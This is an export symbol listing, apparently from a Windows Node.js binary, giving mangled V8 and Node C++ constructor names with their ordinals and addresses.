                                                                                                                                                                                                                                    ??0?$basic_ios@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z2860x1405365c0
                                                                                                                                                                                                                                    ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@IEAA@$$QEAV01@@Z2870x140536600
                                                                                                                                                                                                                                    ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z2880x14010a1b0
                                                                                                                                                                                                                                    ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@W4_Uninitialized@1@_N@Z2890x1405366b0
                                                                                                                                                                                                                                    ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@AEBV01@@Z2900x140536730
                                                                                                                                                                                                                                    ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@W4_Uninitialized@1@@Z2910x140536840
                                                                                                                                                                                                                                    ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ2920x1401013a0
                                                                                                                                                                                                                                    ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@$$QEAV01@@Z2930x14057d540
                                                                                                                                                                                                                                    ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@$$QEAV01@AEBV?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@@Z2940x14057d570
                                                                                                                                                                                                                                    ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@AEBV01@@Z2950x14057d5a0
                                                                                                                                                                                                                                    ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@AEBV01@AEBV?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@@Z2960x14057d660
                                                                                                                                                                                                                                    ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@AEBV?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@@Z2970x14057d720
                                                                                                                                                                                                                                    ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@V?$initializer_list@PEAVMoveOperands@compiler@internal@v8@@@1@AEBV?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@@Z2980x14057d740
                                                                                                                                                                                                                                    ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@XZ2990x14057d7c0
                                                                                                                                                                                                                                    ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@_KAEBQEAVMoveOperands@compiler@internal@v8@@AEBV?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@45@@Z3000x14057d7d0
                                                                                                                                                                                                                                    ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@_KAEBV?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@@Z3010x14057d840
                                                                                                                                                                                                                                    ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@$$QEAV01@@Z3020x140099f40
                                                                                                                                                                                                                                    ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@$$QEAV01@AEBV?$allocator@UCpuProfileDeoptFrame@v8@@@1@@Z3030x140099f00
                                                                                                                                                                                                                                    ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@AEBV01@@Z3040x14009b030
                                                                                                                                                                                                                                    ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@AEBV01@AEBV?$allocator@UCpuProfileDeoptFrame@v8@@@1@@Z3050x14009b030
                                                                                                                                                                                                                                    ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@AEBV?$allocator@UCpuProfileDeoptFrame@v8@@@1@@Z3060x14009a1b0
                                                                                                                                                                                                                                    ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@V?$initializer_list@UCpuProfileDeoptFrame@v8@@@1@AEBV?$allocator@UCpuProfileDeoptFrame@v8@@@1@@Z3070x14009b0c0
                                                                                                                                                                                                                                    ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@XZ3080x14009a1b0
                                                                                                                                                                                                                                    ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@_KAEBUCpuProfileDeoptFrame@v8@@AEBV?$allocator@UCpuProfileDeoptFrame@v8@@@1@@Z3090x14009b160
                                                                                                                                                                                                                                    ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@_KAEBV?$allocator@UCpuProfileDeoptFrame@v8@@@1@@Z3100x14009b1e0
                                                                                                                                                                                                                                    ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@$$QEAV01@@Z3110x140099f40
                                                                                                                                                                                                                                    ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@$$QEAV01@AEBV?$allocator@UCpuProfileDeoptInfo@v8@@@1@@Z3120x140099f00
                                                                                                                                                                                                                                    ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@AEBV01@@Z3130x140099fa0
                                                                                                                                                                                                                                    ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@AEBV01@AEBV?$allocator@UCpuProfileDeoptInfo@v8@@@1@@Z3140x140099fa0
                                                                                                                                                                                                                                    ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@AEBV?$allocator@UCpuProfileDeoptInfo@v8@@@1@@Z3150x14009a1b0
                                                                                                                                                                                                                                    ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@V?$initializer_list@UCpuProfileDeoptInfo@v8@@@1@AEBV?$allocator@UCpuProfileDeoptInfo@v8@@@1@@Z3160x14009a010
                                                                                                                                                                                                                                    ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@XZ3170x14009a1b0
                                                                                                                                                                                                                                    ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@_KAEBUCpuProfileDeoptInfo@v8@@AEBV?$allocator@UCpuProfileDeoptInfo@v8@@@1@@Z3180x14009a090
                                                                                                                                                                                                                                    ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@_KAEBV?$allocator@UCpuProfileDeoptInfo@v8@@@1@@Z3190x14009a100
                                                                                                                                                                                                                                    ??0AccountingAllocator@internal@v8@@QEAA@XZ3200x1407ae5f0
                                                                                                                                                                                                                                    ??0ActivityControl@v8@@QEAA@AEBV01@@Z3210x140097ae0
                                                                                                                                                                                                                                    ??0ActivityControl@v8@@QEAA@XZ3220x140097ae0
                                                                                                                                                                                                                                    ??0AddTypeAssertionsReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVZone@23@@Z3230x1410f4ed0
                                                                                                                                                                                                                                    ??0AddressSpaceReservation@base@v8@@AEAA@PEAX_K@Z3240x140504370
                                                                                                                                                                                                                                    ??0AddressToTraceMap@internal@v8@@QEAA@$$QEAV012@@Z3250x14086a4c0
                                                                                                                                                                                                                                    ??0AddressToTraceMap@internal@v8@@QEAA@AEBV012@@Z3260x14086a520
                                                                                                                                                                                                                                    ??0AddressToTraceMap@internal@v8@@QEAA@XZ3270x14086a580
                                                                                                                                                                                                                                    ??0AlignedCachedData@internal@v8@@QEAA@PEBEH@Z3280x1407edfd0
                                                                                                                                                                                                                                    ??0AlignedSlotAllocator@internal@v8@@QEAA@XZ3290x14057d8b0
                                                                                                                                                                                                                                    ??0AllocationProfile@v8@@QEAA@AEBV01@@Z3300x140098b00
                                                                                                                                                                                                                                    ??0AllocationProfile@v8@@QEAA@XZ3310x140098b00
                                                                                                                                                                                                                                    ??0Allocator@ArrayBuffer@v8@@QEAA@AEBV012@@Z3320x140097870
                                                                                                                                                                                                                                    ??0Allocator@ArrayBuffer@v8@@QEAA@XZ3330x140097870
                                                                                                                                                                                                                                    ??0AllowCompilation@internal@v8@@QEAA@PEAVIsolate@12@@Z3340x140bda790
                                                                                                                                                                                                                                    ??0AllowDeoptimization@internal@v8@@QEAA@PEAVIsolate@12@@Z3350x140bda7b0
                                                                                                                                                                                                                                    ??0AllowExceptions@internal@v8@@QEAA@PEAVIsolate@12@@Z3360x140bda7d0
                                                                                                                                                                                                                                    ??0AllowJavascriptExecution@internal@v8@@QEAA@PEAVIsolate@12@@Z3370x140bda7f0
                                                                                                                                                                                                                                    ??0AllowJavascriptExecutionScope@Isolate@v8@@QEAA@PEAV12@@Z3380x140c76540
                                                                                                                                                                                                                                    ??0ArrayBufferAllocator@node@@QEAA@$$QEAV01@@Z3390x140098710
                                                                                                                                                                                                                                    ??0ArrayBufferAllocator@node@@QEAA@AEBV01@@Z3400x140098710
                                                                                                                                                                                                                                    ??0ArrayBufferAllocator@node@@QEAA@XZ3410x140098710
                                                                                                                                                                                                                                    ??0AsmCallableType@wasm@internal@v8@@IEAA@XZ3420x14072f0f0
                                                                                                                                                                                                                                    ??0AsmFunctionType@wasm@internal@v8@@IEAA@PEAVZone@23@PEAVAsmType@123@@Z3430x14072f100
                                                                                                                                                                                                                                    ??0AsmJsOffsetInformation@wasm@internal@v8@@QEAA@V?$Vector@$$CBE@base@3@@Z3440x14062cf40
                                                                                                                                                                                                                                    ??0AsmJsScanner@internal@v8@@QEAA@$$QEAV012@@Z3450x140731a20
                                                                                                                                                                                                                                    ??0AsmJsScanner@internal@v8@@QEAA@AEBV012@@Z3460x140731b10
                                                                                                                                                                                                                                    ??0AsmJsScanner@internal@v8@@QEAA@PEAVUtf16CharacterStream@12@@Z3470x140731be0
                                                                                                                                                                                                                                    ??0AsmOverloadedFunctionType@wasm@internal@v8@@AEAA@PEAVZone@23@@Z3480x14072f130
                                                                                                                                                                                                                                    ??0Assembler@internal@v8@@QEAA@AEBUAssemblerOptions@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z3490x1405fd620
                                                                                                                                                                                                                                    ??0AssemblerBase@internal@v8@@QEAA@AEBUAssemblerOptions@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z3500x140c0e940
                                                                                                                                                                                                                                    ??0AssemblerOptions@internal@v8@@QEAA@XZ3510x1405590b0
                                                                                                                                                                                                                                    ??0AsyncResource@node@@QEAA@PEAVIsolate@v8@@V?$Local@VObject@v8@@@3@PEBDN@Z3520x1402a1fe0
                                                                                                                                                                                                                                    ??0AsyncStreamingDecoder@wasm@internal@v8@@QEAA@V?$unique_ptr@VStreamingProcessor@wasm@internal@v8@@U?$default_delete@VStreamingProcessor@wasm@internal@v8@@@std@@@std@@@Z3530x140667f00
                                                                                                                                                                                                                                    ??0BackgroundCompileTask@internal@v8@@QEAA@PEAUScriptStreamingData@12@PEAVIsolate@12@W4ScriptType@2@@Z3540x140bffe40
                                                                                                                                                                                                                                    ??0BackgroundCompileTask@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VSharedFunctionInfo@internal@v8@@@12@V?$unique_ptr@VUtf16CharacterStream@internal@v8@@U?$default_delete@VUtf16CharacterStream@internal@v8@@@std@@@std@@PEAVWorkerThreadRuntimeCallStats@12@PEAVTimedHistogram@12@H@Z3550x140c00010
                                                                                                                                                                                                                                    ??0BackgroundDeserializeTask@internal@v8@@QEAA@PEAVIsolate@12@V?$unique_ptr@UCachedData@ScriptCompiler@v8@@U?$default_delete@UCachedData@ScriptCompiler@v8@@@std@@@std@@@Z3560x140c00240
                                                                                                                                                                                                                                    ??0BackingStore@internal@v8@@AEAA@PEAX_K11W4SharedFlag@12@W4ResizableFlag@12@_N4444@Z3570x140a05f50
                                                                                                                                                                                                                                    ??0BackupIncumbentScope@Context@v8@@QEAA@V?$Local@VContext@v8@@@2@@Z3580x140c76590
                                                                                                                                                                                                                                    ??0BasePage@internal@cppgc@@IEAA@AEAVHeapBase@12@AEAVBaseSpace@12@W4PageType@012@@Z3590x14051a060
                                                                                                                                                                                                                                    ??0BaseSpace@internal@cppgc@@IEAA@PEAVRawHeap@12@_KW4PageType@012@_N@Z3600x140519b40
                                                                                                                                                                                                                                    ??0BaseSpace@internal@v8@@IEAA@PEAVHeap@12@W4AllocationSpace@12@@Z3610x1405368e0
                                                                                                                                                                                                                                    ??0BasicBlock@compiler@internal@v8@@QEAA@PEAVZone@23@VId@0123@@Z3620x141067490
                                                                                                                                                                                                                                    ??0BasicBlockProfilerData@internal@v8@@QEAA@V?$Handle@VOnHeapBasicBlockProfilerData@internal@v8@@@12@PEAVIsolate@12@@Z3630x140ba0ae0
                                                                                                                                                                                                                                    ??0BasicBlockProfilerData@internal@v8@@QEAA@VOnHeapBasicBlockProfilerData@12@@Z3640x140ba0b50
                                                                                                                                                                                                                                    ??0BigIntToI32PairDescriptor@internal@v8@@IEAA@W4Key@CallDescriptors@12@@Z3650x14057d2a0
                                                                                                                                                                                                                                    ??0BigIntToI32PairDescriptor@internal@v8@@QEAA@XZ3660x14057d8d0
                                                                                                                                                                                                                                    ??0BigIntToI64Descriptor@internal@v8@@IEAA@W4Key@CallDescriptors@12@@Z3670x14057d2a0
                                                                                                                                                                                                                                    ??0BigIntToI64Descriptor@internal@v8@@QEAA@XZ3680x14057d8e0
                                                                                                                                                                                                                                    ??0Bignum@base@v8@@QEAA@XZ3690x141003580
                                                                                                                                                                                                                                    ??0Binary@protocol@v8_inspector@@AEAA@V?$shared_ptr@V?$vector@EV?$allocator@E@std@@@std@@@std@@@Z3700x1404e3e70
                                                                                                                                                                                                                                    ??0Binary@protocol@v8_inspector@@QEAA@$$QEAV012@@Z3710x1404e3f00
                                                                                                                                                                                                                                    ??0Binary@protocol@v8_inspector@@QEAA@AEBV012@@Z3720x1404e3f30
                                                                                                                                                                                                                                    ??0Binary@protocol@v8_inspector@@QEAA@XZ3730x140097c90
                                                                                                                                                                                                                                    ??0BitVector@internal@v8@@QEAA@AEBV012@PEAVZone@12@@Z3740x140536900
                                                                                                                                                                                                                                    ??0BitVector@internal@v8@@QEAA@HPEAVZone@12@@Z3750x1405369a0
                                                                                                                                                                                                                                    ??0BitVector@internal@v8@@QEAA@XZ3760x140536a70
                                                                                                                                                                                                                                    ??0BlockBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVBreakableStatement@23@@Z3770x140a32630
                                                                                                                                                                                                                                    ??0BlockData@Coverage@debug@v8@@AEAA@PEAUCoverageBlock@internal@3@V?$shared_ptr@VCoverage@internal@v8@@@std@@@Z3780x140536a90
                                                                                                                                                                                                                                    ??0BlockData@Coverage@debug@v8@@QEAA@$$QEAV0123@@Z3790x140536ac0
                                                                                                                                                                                                                                    ??0BookmarkScope@Scanner@internal@v8@@QEAA@PEAV123@@Z3800x140536af0
                                                                                                                                                                                                                                    ??0BoundedPageAllocator@base@v8@@QEAA@PEAVPageAllocator@2@_K11W4PageInitializationMode@12@@Z3810x140ffb610
                                                                                                                                                                                                                                    ??0BranchConditionDuplicator@compiler@internal@v8@@QEAA@PEAVZone@23@PEAVGraph@123@@Z3820x141116520
                                                                                                                                                                                                                                    ??0BranchElimination@compiler@internal@v8@@QEAA@AEBV0123@@Z3830x141091860
                                                                                                                                                                                                                                    ??0BranchElimination@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVZone@23@PEAVSourcePositionTable@123@W4Phase@0123@@Z3840x141116d80
                                                                                                                                                                                                                                    ??0BranchHintMap@wasm@internal@v8@@QEAA@$$QEAV0123@@Z3850x140536b10
                                                                                                                                                                                                                                    ??0BranchHintMap@wasm@internal@v8@@QEAA@AEBV0123@@Z3860x140536bf0
                                                                                                                                                                                                                                    ??0BranchHintMap@wasm@internal@v8@@QEAA@XZ3870x14050fcf0
                                                                                                                                                                                                                                    ??0BranchMatcher@compiler@internal@v8@@QEAA@PEAVNode@123@@Z3880x141249530
                                                                                                                                                                                                                                    ??0BreakIterator@internal@v8@@QEAA@V?$Handle@VDebugInfo@internal@v8@@@12@@Z3890x140bb6c50
                                                                                                                                                                                                                                    ??0BreakLocation@debug@v8@@QEAA@HHW4BreakLocationType@12@@Z3900x140536c80
                                                                                                                                                                                                                                    ??0BreakableControlFlowBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVAstNode@23@@Z3910x140a32660
                                                                                                                                                                                                                                    ??0ByteData@PreparseDataBuilder@internal@v8@@QEAA@XZ3920x140536cb0
                                                                                                                                                                                                                                    ??0BytecodeAnalysis@compiler@internal@v8@@QEAA@V?$Handle@VBytecodeArray@internal@v8@@@23@PEAVZone@23@VBytecodeOffset@23@_N@Z3930x141246e60
                                                                                                                                                                                                                                    ??0BytecodeArrayBuilder@interpreter@internal@v8@@QEAA@PEAVZone@23@HHPEAVFeedbackVectorSpec@23@W4RecordingMode@SourcePositionTableBuilder@23@@Z3940x140a58e50
                                                                                                                                                                                                                                    ??0BytecodeArrayIterator@interpreter@internal@v8@@QEAA@V?$Handle@VBytecodeArray@internal@v8@@@23@H@Z3950x140a53310
                                                                                                                                                                                                                                    ??0BytecodeArrayRandomIterator@interpreter@internal@v8@@QEAA@V?$Handle@VBytecodeArray@internal@v8@@@23@PEAVZone@23@@Z3960x140a52d70
                                                                                                                                                                                                                                    ??0BytecodeArrayWriter@interpreter@internal@v8@@QEAA@PEAVZone@23@PEAVConstantArrayBuilder@123@W4RecordingMode@SourcePositionTableBuilder@23@@Z3970x140a51f40
                                                                                                                                                                                                                                    ??0BytecodeIterator@wasm@internal@v8@@QEAA@$$QEAV0123@@Z3980x140617eb0
                                                                                                                                                                                                                                    ??0BytecodeIterator@wasm@internal@v8@@QEAA@AEBV0123@@Z3990x140617eb0
                                                                                                                                                                                                                                    ??0BytecodeIterator@wasm@internal@v8@@QEAA@PEBE0PEAUBodyLocalDecls@123@@Z4000x1406beec0
                                                                                                                                                                                                                                    ??0BytecodeJumpTable@interpreter@internal@v8@@QEAA@_KHHPEAVZone@23@@Z4010x140a326f0
                                                                                                                                                                                                                                    ??0BytecodeLabel@interpreter@internal@v8@@QEAA@XZ4020x140a30580
                                                                                                                                                                                                                                    ??0BytecodeLabels@interpreter@internal@v8@@QEAA@PEAVZone@23@@Z4030x140a30590
                                                                                                                                                                                                                                    ??0BytecodeLivenessMap@compiler@internal@v8@@QEAA@HPEAVZone@23@@Z4040x1410df8f0
                                                                                                                                                                                                                                    ??0BytecodeLoopAssignments@compiler@internal@v8@@QEAA@HHPEAVZone@23@@Z4050x1412470b0
                                                                                                                                                                                                                                    ??0BytecodeLoopHeader@interpreter@internal@v8@@QEAA@XZ4060x14057e810
                                                                                                                                                                                                                                    ??0BytecodeNode@interpreter@internal@v8@@AEAA@W4Bytecode@123@HW4OperandScale@123@VBytecodeSourceInfo@123@IIIII@Z4070x140a38df0
                                                                                                                                                                                                                                    ??0BytecodeNode@interpreter@internal@v8@@QEAA@W4Bytecode@123@IIIIIVBytecodeSourceInfo@123@@Z4080x140a38e30
                                                                                                                                                                                                                                    ??0BytecodeNode@interpreter@internal@v8@@QEAA@W4Bytecode@123@IIIIVBytecodeSourceInfo@123@@Z4090x140a390f0
                                                                                                                                                                                                                                    ??0BytecodeNode@interpreter@internal@v8@@QEAA@W4Bytecode@123@IIIVBytecodeSourceInfo@123@@Z4100x140a39330
                                                                                                                                                                                                                                    ??0BytecodeNode@interpreter@internal@v8@@QEAA@W4Bytecode@123@IIVBytecodeSourceInfo@123@@Z4110x140a394f0
                                                                                                                                                                                                                                    ??0BytecodeNode@interpreter@internal@v8@@QEAA@W4Bytecode@123@IVBytecodeSourceInfo@123@@Z4120x140a39630
                                                                                                                                                                                                                                    ??0BytecodeNode@interpreter@internal@v8@@QEAA@W4Bytecode@123@VBytecodeSourceInfo@123@@Z4130x140a39710
                                                                                                                                                                                                                                    ??0BytecodeOffsetIterator@baseline@internal@v8@@QEAA@V?$Handle@VByteArray@internal@v8@@@23@V?$Handle@VBytecodeArray@internal@v8@@@23@@Z4140x140c53420
                                                                                                                                                                                                                                    ??0BytecodeOffsetIterator@baseline@internal@v8@@QEAA@VByteArray@23@VBytecodeArray@23@@Z4150x140c534c0
                                                                                                                                                                                                                                    ??0BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAA@PEAVZone@23@PEAVBytecodeRegisterAllocator@123@HHPEAVBytecodeWriter@0123@@Z4160x140a379a0
                                                                                                                                                                                                                                    ??0CFunction@v8@@QEAA@PEBXPEBVCFunctionInfo@1@@Z4170x140c765e0
                                                                                                                                                                                                                                    ??0CFunction@v8@@QEAA@XZ4180x140097c90
                                                                                                                                                                                                                                    ??0CFunctionInfo@v8@@QEAA@AEBVCTypeInfo@1@IPEBV21@@Z4190x140c76630
                                                                                                                                                                                                                                    ??0CPU@base@v8@@QEAA@XZ4200x140ff65a0
                                                                                                                                                                                                                                    ??0CachedData@ScriptCompiler@v8@@QEAA@PEBEHW4BufferPolicy@012@@Z4210x140c76650
                                                                                                                                                                                                                                    ??0CachedData@ScriptCompiler@v8@@QEAA@XZ4220x140097ab0
                                                                                                                                                                                                                                    ??0CallDescriptor@compiler@internal@v8@@QEAA@W4Kind@0123@VMachineType@23@VLinkageLocation@123@PEAV?$Signature@VLinkageLocation@compiler@internal@v8@@@23@_KV?$Flags@W4Property@Operator@compiler@internal@v8@@E@base@3@V?$RegListBase@VRegister@internal@v8@@@23@V?$RegListBase@VXMMRegister@internal@v8@@@23@V?$Flags@W4Flag@CallDescriptor@compiler@internal@v8@@H@93@PEBDW4StackArgumentOrder@23@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@V?$RegListBase@VRegister@internal@v8@@@23@4@Z4230x14057d8f0
                                                                                                                                                                                                                                    ??0CallInterfaceDescriptor@internal@v8@@QEAA@W4Key@CallDescriptors@12@@Z4240x14057d2a0
                                                                                                                                                                                                                                    ??0CallInterfaceDescriptor@internal@v8@@QEAA@XZ4250x14010d5b0
                                                                                                                                                                                                                                    ??0CallInterfaceDescriptorData@internal@v8@@QEAA@XZ4260x14057d970
                                                                                                                                                                                                                                    ??0CallRuntimeParameters@compiler@internal@v8@@QEAA@W4FunctionId@Runtime@23@_K@Z4270x1400978c0
                                                                                                                                                                                                                                    ??0CallbackScope@AsyncResource@node@@QEAA@PEAV12@@Z4280x1402a2110
                                                                                                                                                                                                                                    ??0CallbackScope@node@@QEAA@PEAVEnvironment@1@V?$Local@VObject@v8@@@v8@@Uasync_context@1@@Z4290x1402a0c60
                                                                                                                                                                                                                                    ??0CallbackScope@node@@QEAA@PEAVIsolate@v8@@V?$Local@VObject@v8@@@3@Uasync_context@1@@Z4300x1402a0ce0
                                                                                                                                                                                                                                    ??0Cancelable@internal@v8@@QEAA@PEAVCancelableTaskManager@12@@Z4310x140536cc0
                                                                                                                                                                                                                                    ??0CancelableTask@internal@v8@@QEAA@PEAVCancelableTaskManager@12@@Z4320x1407c7400
                                                                                                                                                                                                                                    ??0CancelableTask@internal@v8@@QEAA@PEAVIsolate@12@@Z4330x1407c7450
                                                                                                                                                                                                                                    ??0CancelableTaskManager@internal@v8@@QEAA@XZ4340x1407c74a0
                                                                                                                                                                                                                                    ??0CanonicalHandleScope@internal@v8@@QEAA@PEAVIsolate@12@PEAVZone@12@@Z4350x140b4ae60
                                                                                                                                                                                                                                    ??0Channel@V8Inspector@v8_inspector@@QEAA@AEBV012@@Z4360x1404e3f60
                                                                                                                                                                                                                                    ??0Channel@V8Inspector@v8_inspector@@QEAA@XZ4370x1404e3f60
                                                                                                                                                                                                                                    ??0CheckpointElimination@compiler@internal@v8@@QEAA@AEBV0123@@Z4380x1410919c0
                                                                                                                                                                                                                                    ??0CheckpointElimination@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@@Z4390x141127090
                                                                                                                                                                                                                                    ??0ClassScope@internal@v8@@QEAA@$$QEAV012@@Z4400x1407fe2a0
                                                                                                                                                                                                                                    ??0ClassScope@internal@v8@@QEAA@PEAVZone@12@PEAVScope@12@_N@Z4410x140c61b70
                                                                                                                                                                                                                                    ??0CodeAssembler@compiler@internal@v8@@QEAA@PEAVCodeAssemblerState@123@@Z4420x140097ad0
                                                                                                                                                                                                                                    ??0CodeAssemblerLabel@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@AEBV?$ZoneVector@PEAVCodeAssemblerVariable@compiler@internal@v8@@@23@W4Type@0123@@Z4430x140c0cca0
                                                                                                                                                                                                                                    ??0CodeAssemblerLabel@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@PEAVCodeAssemblerVariable@123@W4Type@0123@@Z4440x140c0ccd0
                                                                                                                                                                                                                                    ??0CodeAssemblerLabel@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@V?$initializer_list@PEAVCodeAssemblerVariable@compiler@internal@v8@@@std@@W4Type@0123@@Z4450x140c0cd00
                                                                                                                                                                                                                                    ??0CodeAssemblerLabel@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@W4Type@0123@@Z4460x140c0cd30
                                                                                                                                                                                                                                    ??0CodeAssemblerLabel@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@_KPEBQEAVCodeAssemblerVariable@123@W4Type@0123@@Z4470x1410a5480
                                                                                                                                                                                                                                    ??0CodeAssemblerState@compiler@internal@v8@@AEAA@PEAVIsolate@23@PEAVZone@23@PEAVCallDescriptor@123@W4CodeKind@23@PEBDW4Builtin@23@@Z4480x1410a5680
                                                                                                                                                                                                                                    ??0CodeAssemblerState@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVZone@23@AEBVCallInterfaceDescriptor@23@W4CodeKind@23@PEBDW4Builtin@23@@Z4490x1410a58f0
                                                                                                                                                                                                                                    ??0CodeAssemblerState@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVZone@23@HW4CodeKind@23@PEBDW4Builtin@23@@Z4500x1410a5980
                                                                                                                                                                                                                                    ??0CodeAssemblerVariable@compiler@internal@v8@@IEAA@PEAVCodeAssembler@123@W4MachineRepresentation@23@@Z4510x1410a59f0
                                                                                                                                                                                                                                    ??0CodeAssemblerVariable@compiler@internal@v8@@IEAA@PEAVCodeAssembler@123@W4MachineRepresentation@23@PEAVNode@123@@Z4520x1410a5b70
                                                                                                                                                                                                                                    ??0CodeBuilder@Factory@internal@v8@@QEAA@PEAVIsolate@23@AEBVCodeDesc@23@W4CodeKind@23@@Z4530x140b203b0
                                                                                                                                                                                                                                    ??0CodeBuilder@Factory@internal@v8@@QEAA@PEAVLocalIsolate@23@AEBVCodeDesc@23@W4CodeKind@23@@Z4540x140b20420
                                                                                                                                                                                                                                    ??0CodeCommentsIterator@internal@v8@@QEAA@_KI@Z4550x140c0e4b0
                                                                                                                                                                                                                                    ??0CodeEntryStorage@internal@v8@@QEAA@XZ4560x14085c820
                                                                                                                                                                                                                                    ??0CodeEventHandler@v8@@QEAA@PEAVIsolate@1@@Z4570x140c76670
                                                                                                                                                                                                                                    ??0CodeEventLogger@internal@v8@@QEAA@PEAVIsolate@12@@Z4580x140a0e290
                                                                                                                                                                                                                                    ??0CodeGenerator@compiler@internal@v8@@QEAA@PEAVZone@23@PEAVFrame@123@PEAVLinkage@123@PEAVInstructionSequence@123@PEAVOptimizedCompilationInfo@23@PEAVIsolate@23@V?$Optional@VOsrHelper@compiler@internal@v8@@@base@3@HPEAVJumpOptimizationInfo@23@AEBUAssemblerOptions@23@W4Builtin@23@_K_KPEBD@Z4590x14106a760
                                                                                                                                                                                                                                    ??0CodeMap@internal@v8@@QEAA@AEAVCodeEntryStorage@12@@Z4600x140864f00
                                                                                                                                                                                                                                    ??0CodeObjectRegistry@internal@v8@@QEAA@XZ4610x140536d00
                                                                                                                                                                                                                                    ??0CodeSpaceWriteScope@wasm@internal@v8@@QEAA@PEAVNativeModule@123@@Z4620x1406d5760
